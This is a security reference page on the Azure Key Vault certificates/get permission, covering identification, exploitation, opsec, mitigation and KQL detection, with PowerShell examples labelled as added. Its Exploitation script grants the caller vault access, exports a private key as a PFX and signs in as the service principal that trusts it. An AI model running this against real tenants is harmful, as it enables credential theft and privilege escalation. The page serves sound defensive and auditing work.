AZ_GET_CERTIFICATES
Summary
FSProtect ACL Alias: AZ_GET_CERTIFICATES
Azure Alias: Get Certificates (Key Vault Data Plane)
Affected Object Types: Key Vaults
Exploitation Certainty: Certain
Permission: Key Vault data-plane permission certificates/get, granted either through a Key Vault access policy (Get under Certificate permissions) or through the Azure RBAC role Key Vault Certificate User (also carried by Key Vault Certificates Officer and Key Vault Administrator). Exporting the private key additionally requires secrets/get (Key Vault Secrets User), because the private key is read from the certificate's backing secret.
Description
AZ_GET_CERTIFICATES represents the ability to read certificates from an Azure Key Vault. This is a data-plane permission that allows retrieval of certificate objects stored in the vault: the public certificate, its policy and metadata. A Key Vault certificate is backed by a key and a secret of the same name; when the certificate was created with an exportable private key, that key is retrieved as a PFX (or PEM) from the backing secret, which requires secrets/get on the same vault. In practice the two permissions are very often granted together.
Key Vault certificates are used for:
Service principal authentication — certificates used as credentials for Entra ID applications.
TLS/SSL certificates — for web apps, API gateways, and other services.
Code signing certificates.
Encryption certificates — S/MIME, document encryption.
The most dangerous scenario is when certificates are used as service principal credentials. Exporting such a certificate allows an attacker to authenticate as the service principal and inherit all its permissions, including potentially privileged API permissions or Azure RBAC roles.
Identification
PowerShell (Az Module)
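The following is an added example (not the page's own code) that enumerates who holds certificates/get on a vault with the Az module. It handles both vault permission models: for RBAC-model vaults it inspects the data actions of every assigned role definition (so custom roles are caught too, not only the built-in names), and for access-policy vaults it reads the policy entries. The vault name is a placeholder; Az.KeyVault and Az.Resources and an authenticated session with Reader on the vault are assumed.

```powershell
# Added example, not from the original page. Assumes Az.KeyVault + Az.Resources and a session
# established with Connect-AzAccount. 'target-kv' is a placeholder vault name.
$VaultName = 'target-kv'
$vault = Get-AzKeyVault -VaultName $VaultName

if ($vault.EnableRbacAuthorization) {
    # RBAC-model vault: certificates/get comes from role assignments at the vault scope or
    # inherited from resource group / subscription / management group.
    $defs = @{}
    Get-AzRoleAssignment -Scope $vault.ResourceId | ForEach-Object {
        if (-not $defs.ContainsKey($_.RoleDefinitionId)) {
            $defs[$_.RoleDefinitionId] = Get-AzRoleDefinition -Id $_.RoleDefinitionId
        }
        $def = $defs[$_.RoleDefinitionId]
        # Match the data action itself (wildcards such as Microsoft.KeyVault/vaults/*/read included)
        # rather than role names. NotDataActions are not evaluated here; review those by hand.
        $grants = $def.DataActions | Where-Object { 'Microsoft.KeyVault/vaults/certificates/read' -like $_ }
        if ($grants) {
            [pscustomobject]@{
                Principal = $_.DisplayName; Type = $_.ObjectType; ObjectId = $_.ObjectId
                Role = $_.RoleDefinitionName; Scope = $_.Scope
            }
        }
    }
} else {
    # Access-policy vault: 'Get' (or 'All') under certificate permissions.
    $vault.AccessPolicies | Where-Object {
        ($_.PermissionsToCertificates -contains 'Get') -or ($_.PermissionsToCertificates -contains 'All')
    } | ForEach-Object {
        [pscustomobject]@{
            Principal   = $_.DisplayName; ObjectId = $_.ObjectId
            CertPerms   = ($_.PermissionsToCertificates -join ',')
            SecretPerms = ($_.PermissionsToSecrets -join ',')   # 'Get' here is what allows private-key export
        }
    }
}
```

Pay attention to the SecretPerms column (or, on RBAC vaults, to Key Vault Secrets User assignments): a principal with certificates/get but no secrets/get can read the public certificate only.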
Azure GUI
Open Azure Portal → navigate to the target Key Vault.
Go to Access policies → review policies that include Get under Certificate permissions.
Alternatively, go to Access control (IAM) → review assignments for certificate-related roles.
Exploitation
Step 1 — Grant Yourself Certificate Access (as Key Vault Contributor)
Step 2 — Read and Export Certificates
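Both steps carried through with the Az module, as an added example rather than the page's own code. It assumes the current session holds Key Vault Contributor on the vault, and that vault name, certificate name and output path are placeholders. Step 1 only works on vaults that still use the access-policy model: Key Vault Contributor is a management-plane role and cannot assign data-plane RBAC roles on an RBAC-model vault (that needs Owner or User Access Administrator). The thumbprint match against application keyCredentials is an assumption about the Microsoft Graph shape returned by Get-AzADApplication.

```powershell
# Added example, not from the original page. Assumes Az.Accounts, Az.KeyVault and Az.Resources.
# 'target-kv', 'sp-auth-cert' and $OutFile are placeholders.
$VaultName = 'target-kv'
$CertName  = 'sp-auth-cert'
$OutFile   = Join-Path $env:TEMP "$CertName.pfx"

# ---- Step 1: grant yourself certificates/get (and secrets/get for the private key) ----
$vault = Get-AzKeyVault -VaultName $VaultName
if ($vault.EnableRbacAuthorization) {
    throw 'RBAC-model vault: Key Vault Contributor cannot grant data-plane access here.'
}
$me = (Get-AzADUser -SignedIn).Id      # for a service principal context use Get-AzADServicePrincipal
Set-AzKeyVaultAccessPolicy -VaultName $VaultName -ObjectId $me `
    -PermissionsToCertificates get,list -PermissionsToSecrets get   # management-plane write, logged as VaultPatch

# ---- Step 2: read the certificate and export the private key ----
# certificates/get returns the public certificate, thumbprint and policy only.
$cert   = Get-AzKeyVaultCertificate       -VaultName $VaultName -Name $CertName   # logged as CertificateGet
$policy = Get-AzKeyVaultCertificatePolicy -VaultName $VaultName -Name $CertName
"{0} thumbprint={1} exportable={2}" -f $cert.Name, $cert.Thumbprint, $policy.Exportable
if (-not $policy.Exportable) { throw 'Private key is non-exportable; only the public certificate is readable.' }

# The private key lives in the backing secret of the same name; reading it is a SecretGet.
$secret = Get-AzKeyVaultSecret -VaultName $VaultName -Name $CertName
$plain  = Get-AzKeyVaultSecret -VaultName $VaultName -Name $CertName -AsPlainText
if ($secret.ContentType -eq 'application/x-pkcs12') {
    [IO.File]::WriteAllBytes($OutFile, [Convert]::FromBase64String($plain))   # unprotected PFX
} else {
    $OutFile = [IO.Path]::ChangeExtension($OutFile, '.pem')
    Set-Content -Path $OutFile -Value $plain -NoNewline
}

# ---- Use it: find the application that trusts this certificate and sign in as it ----
# Assumption: KeyCredentials[].CustomKeyIdentifier holds the SHA-1 thumbprint bytes.
$app = Get-AzADApplication | Where-Object {
    $_.KeyCredentials | Where-Object {
        (($_.CustomKeyIdentifier | ForEach-Object { $_.ToString('X2') }) -join '') -eq $cert.Thumbprint
    }
} | Select-Object -First 1
if ($app -and $OutFile.EndsWith('.pfx')) {
    Connect-AzAccount -ServicePrincipal -ApplicationId $app.AppId -TenantId $vault.TenantId -CertificatePath $OutFile
}
```

Every call in Step 2 lands in the vault's AuditEvent log (CertificateGet, then SecretGet), and Step 1 is a management-plane write on the vault, so this sequence is the noisiest possible way to obtain the credential; see Opsec Considerations below.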

Via PowerZure
Get-AzureKeyVaultContent
Export-AzureKeyVaultContent
Opsec Considerations
Azure writes a Key Vault log event whenever a certificate is accessed. Each CertificateGet operation is recorded in the vault's diagnostic logs (AuditEvent category) with the caller identity, the caller IP address and the object URL; retrieving the private key through the backing secret is logged separately as a SecretGet. Editing an access policy to grant yourself access is a management-plane write that appears in the Activity Log as well.
Mitigation
Restrict certificate access policies
Go to Azure Portal → target Key Vault → Access policies.
Remove the Get permission from any principal that does not need to read certificates.
Mark certificates as non-exportable
When creating certificates, set the private key as not exportable (Exportable = false in the certificate policy) to prevent extraction through the backing secret. The setting takes effect for versions issued after the change, so existing exportable certificates have to be re-issued.
Switch to Azure RBAC model
Use granular RBAC roles for certificate access control (Key Vault Certificate User for read access), and review Key Vault Secrets User assignments on the same vault, since that role is what allows private-key export.
Use managed identities instead of certificates
Prefer managed identities over certificate-based service principal authentication where possible.
Enable diagnostic logging
Go to Key Vault → Diagnostic settings → enable AuditEvent logging.
Detection
Monitor certificate access in Key Vault diagnostic logs.
Enable AuditEvent logging on the Key Vault.
Alert on:
CertificateGet operations, especially on certificates used for service principal auth.
Bulk certificate access from unusual identities.
Certificate downloads outside of expected automation patterns.
Azure Monitor / Log Analytics (KQL)
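An added example (not the page's own query) that runs the three alert conditions above as one KQL query against Log Analytics from PowerShell. It assumes the vault's AuditEvent diagnostic setting streams into the AzureDiagnostics table, that Az.OperationalInsights is installed, and that the workspace ID and the watchlist of certificate names backing service principal credentials are placeholders you maintain. The flattened identity column names are an assumption about the AzureDiagnostics schema; check them against your workspace.

```powershell
# Added example, not from the original page. Assumes Az.OperationalInsights and an authenticated session.
$WorkspaceId    = '00000000-0000-0000-0000-000000000000'   # placeholder
$WatchlistCerts = @('sp-auth-cert')                          # placeholder: certs used as SP credentials

$kql = @"
let watchlist = dynamic([$(($WatchlistCerts | ForEach-Object { '"' + $_ + '"' }) -join ',')]);
AzureDiagnostics
| where ResourceProvider == "MICROSOFT.KEYVAULT" and Category == "AuditEvent"
| where OperationName in ("CertificateGet", "SecretGet") and ResultType == "Success"
// id_s is the object URL: https://<vault>.vault.azure.net/<certificates|secrets>/<name>/<version>
| extend ObjectName = tostring(split(parse_url(id_s).Path, "/")[2])
// Assumed column names: user reads carry a UPN claim, app/managed identity reads an appid claim.
| extend Caller = coalesce(identity_claim_http_schemas_xmlsoap_org_ws_2005_05_identity_claims_upn_s,
                           identity_claim_appid_g)
| summarize Reads = count(), Objects = make_set(ObjectName), SourceIPs = make_set(CallerIPAddress)
            by Resource, Caller, bin(TimeGenerated, 1h)
// Bulk access (threshold is a tunable) or any touch of a watchlisted SP-auth certificate.
| where Reads > 20 or array_length(set_intersect(Objects, watchlist)) > 0
| order by TimeGenerated desc
"@

$result = Invoke-AzOperationalInsightsQuery -WorkspaceId $WorkspaceId -Query $kql -Timespan (New-TimeSpan -Days 1)
$result.Results | Format-Table TimeGenerated, Resource, Caller, Reads, Objects, SourceIPs -AutoSize
```

The "outside of expected automation patterns" condition is covered by comparing the Caller column with the identities that legitimately rotate or consume each certificate; add a second watchlist of approved app IDs and an `| where Caller !in (approved)` clause once that list exists.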